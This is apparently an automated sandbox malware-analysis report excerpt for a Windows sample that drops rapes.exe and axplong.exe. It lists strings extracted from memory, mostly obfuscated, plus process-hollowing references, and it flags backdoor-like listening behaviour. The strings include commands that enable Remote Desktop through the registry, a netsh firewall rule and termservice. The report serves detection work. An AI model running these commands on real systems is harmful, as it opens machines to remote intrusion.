bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006AEB78 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		2_2_006AEB78
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006ADE81 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		2_2_006ADE81

Windows Analysis Report
SUAosT64HD.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

